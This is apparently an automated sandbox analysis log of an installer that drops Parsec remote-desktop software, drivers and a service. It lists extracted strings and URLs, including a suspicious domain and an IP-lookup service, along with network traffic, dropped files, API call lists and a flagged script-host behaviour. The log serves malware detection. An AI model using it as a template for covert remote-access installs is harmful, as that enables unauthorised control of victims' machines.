Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576173174.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890878000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0A
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743298668.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337367644.000001989086D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742435199.0000019890869000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309499408.0000019890894000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3576139520.000001989086E000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0C
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575054832.000001988FF65000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743387928.000001989087F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3337299753.000001989087F000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://ocsp.digicert.com0X
Source: pservice.exe, 00000028.00000003.2742828975.000001989006A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRS
Source: pservice.exe, 00000028.00000002.3576074424.0000019890860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertTrustedRootG4.crtFj
Source: pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertAssuredIDRootCA.crlv
Source: pservice.exe, 00000028.00000003.2742558824.000001989004D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.000001989004D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: pservice.exe, 00000028.00000003.2742558824.000001989004D000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.3336997303.000001989004D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, pservice.exe, 00000028.00000003.2742558824.000001988FFEA000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309422964.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2228501112.00000198908B3000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742558824.0000019890081000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2309199634.00000198909A2000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2126735399.000001989002F000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000002.3575628914.000001988FFED000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2743225180.0000019890085000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742804940.0000019890084000.00000004.00000020.00020000.00000000.sdmp, pservice.exe, 00000028.00000003.2742828975.000001988FFEB000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040D000.00000004.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drString found in binary or memory: http://www.digicert.com/CPS0
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.drString found in binary or memory: http://www.unicode.org/copyright.html
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/?CheckApp
Source: uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://beautifullyuncluttered.com/L
Source: uu8v4UUzTU.tmp, 00000001.00000003.1960296249.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153836962.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/G
Source: uu8v4UUzTU.tmp, 00000001.00000002.2154346874.00000000039C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip
Source: uu8v4UUzTU.tmp, 00000001.00000003.1960625837.0000000000854000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153690668.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ifconfig.me/ip5.1ry
Source: uu8v4UUzTU.exe, is-G92OK.tmp.1.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelog
Source: parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec
Source: parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i
Source: parsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 34.160.111.145:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_004056DE
Source: uu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_89948d8e-c
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\SETE849.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{0d19f94d-19ef-cf46-8004-7828b47b053d}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD48.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.cat (copy)Jump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.catJump to dropped file
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.catJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.cat (copy)Jump to dropped file
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.catJump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCB0.tmpJump to dropped file
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE76E.tmpJump to dropped file
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDE94.tmpJump to dropped file
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041A720: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,5_2_0041A720
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C244C0 OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,49_2_00007FF763C244C0
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC021850 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,ProcessIdToSessionId,Process32NextW,CloseHandle,OpenProcess,OpenProcessToken,DuplicateTokenEx,CloseHandle,CloseHandle,CloseHandle,SetTokenInformation,CreateProcessAsUserW,CloseHandle,CloseHandle,40_2_00007FF7EC021850
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,46_2_0040352D
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 66_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,66_2_0040352D
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem5.inf
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Windows\INF\c_display.PNF
Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\DriverStore\Temp\{6f78882e-1a3d-dc43-867f-898abe828d58}\SETDE94.tmp
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0043D0785_2_0043D078
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004251345_2_00425134
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004688065_2_00468806
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0044D9EE5_2_0044D9EE
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041798C5_2_0041798C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0043AB245_2_0043AB24
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0043DD645_2_0043DD64
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0044F0225_2_0044F022
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004231C85_2_004231C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0045F1EC5_2_0045F1EC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0041C2045_2_0041C204
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046328C5_2_0046328C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004312885_2_00431288
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0044541C5_2_0044541C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046E4D15_2_0046E4D1
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046E5C05_2_0046E5C0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004565F05_2_004565F0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004346405_2_00434640
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046469D5_2_0046469D
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004587AC5_2_004587AC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0042E8E05_2_0042E8E0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_004419845_2_00441984
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00443BBC5_2_00443BBC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0042DCAC5_2_0042DCAC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046DD605_2_0046DD60
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00417DE85_2_00417DE8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0042DF785_2_0042DF78
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_00432F005_2_00432F00
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_0040755C12_2_0040755C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeCode function: 12_2_00406D8512_2_00406D85
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02213040_2_00007FF7EC022130
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02912840_2_00007FF7EC029128
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC025D2440_2_00007FF7EC025D24
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02595040_2_00007FF7EC025950
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02557C40_2_00007FF7EC02557C
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02BDA040_2_00007FF7EC02BDA0
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02E1C440_2_00007FF7EC02E1C4
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC031E0C40_2_00007FF7EC031E0C
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC026A2840_2_00007FF7EC026A28
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02EE7040_2_00007FF7EC02EE70
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC029A8C40_2_00007FF7EC029A8C
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC025F0C40_2_00007FF7EC025F0C
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC025B3840_2_00007FF7EC025B38
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02A76040_2_00007FF7EC02A760
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02576440_2_00007FF7EC025764
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02778440_2_00007FF7EC027784
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC0273B840_2_00007FF7EC0273B8
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02C42040_2_00007FF7EC02C420
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC03087840_2_00007FF7EC030878
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC03A89C40_2_00007FF7EC03A89C
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC02B8F040_2_00007FF7EC02B8F0
Source: C:\Program Files\Parsec\pservice.exeCode function: 40_2_00007FF7EC0364E040_2_00007FF7EC0364E0
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_0040755C46_2_0040755C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeCode function: 46_2_00406D8546_2_00406D85
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C114B049_2_00007FF763C114B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C6049049_2_00007FF763C60490
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C1319049_2_00007FF763C13190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C268F049_2_00007FF763C268F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C1474049_2_00007FF763C14740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C04DD049_2_00007FF763C04DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C464AC49_2_00007FF763C464AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C3E4A049_2_00007FF763C3E4A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C0C4D049_2_00007FF763C0C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C5B44C49_2_00007FF763C5B44C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C043A049_2_00007FF763C043A0
